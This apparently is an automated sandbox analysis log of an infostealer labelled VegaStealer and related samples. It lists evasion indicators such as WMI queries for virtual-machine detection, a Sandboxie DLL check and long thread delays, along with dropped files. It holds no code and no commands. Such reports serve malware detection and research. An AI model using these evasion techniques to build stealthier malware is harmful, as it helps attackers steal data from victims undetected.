Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\v2.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\v2.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Memory allocated: 2E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Memory allocated: 6620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Memory allocated: 7620000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 599835	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 599540	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 599119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598994	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598876	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598638	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598522	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598293	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598184	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 598074	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597960	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597842	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597727	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597498	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596458	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596302	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 596104	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595870	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595407	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595282	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594374	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594252	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594134	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 594028	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 593918	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 593594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 593374	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 593161	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 592828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 592641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 592502	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 592328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3962	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5760	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Window / User API: threadDelayed 4199	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Window / User API: threadDelayed 4891	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6483
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3082
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3402
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1835
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7475
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2138
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7662
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1809
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 407

Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\SQLite.Interop.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod1_extract\WZSetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\zbShieldUtils.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\is-L3QGH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\CheatEngine75.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extract\saBSI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod2 (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EntityFramework.SqlServer.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BouncyCastle.Crypto.dll	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\cfoutowi.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod2.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EntityFramework.dll	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file

Source: C:\Users\user\Desktop\SharcHack.exe	API coverage: 8.3 %
Source: C:\Users\user\AppData\Local\Temp\v2.exe	API coverage: 2.3 %
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp	API coverage: 3.5 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2076	Thread sleep count: 3962 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2076	Thread sleep count: 5760 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1096	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -599835s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -599540s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -599250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -599119s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -598994s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -598876s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -598638s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -598522s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -598293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -598184s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -598074s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -597960s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -597842s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -597727s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -597498s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -596796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -596684s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -596458s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -596302s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -596104s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -595870s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -595407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -595282s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -594374s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -594252s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -594134s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -594028s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -593918s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -593735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -593594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -593374s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -593161s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -592828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -592641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -592502s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 360	Thread sleep time: -592328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 5064	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 7096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\v2.exe TID: 5516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp TID: 3228	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628	Thread sleep count: 6483 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628	Thread sleep count: 3082 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2664	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368	Thread sleep count: 3402 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368	Thread sleep count: 1835 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2104	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3772	Thread sleep count: 7475 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4696	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708	Thread sleep count: 2138 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6404	Thread sleep count: 7662 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2364	Thread sleep count: 1809 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416	Thread sleep time: -2767011611056431s >= -30000s

Source: C:\Windows\System32\powercfg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\powercfg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\v2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Windows\System32\powercfg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\powercfg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\v2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\v2.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
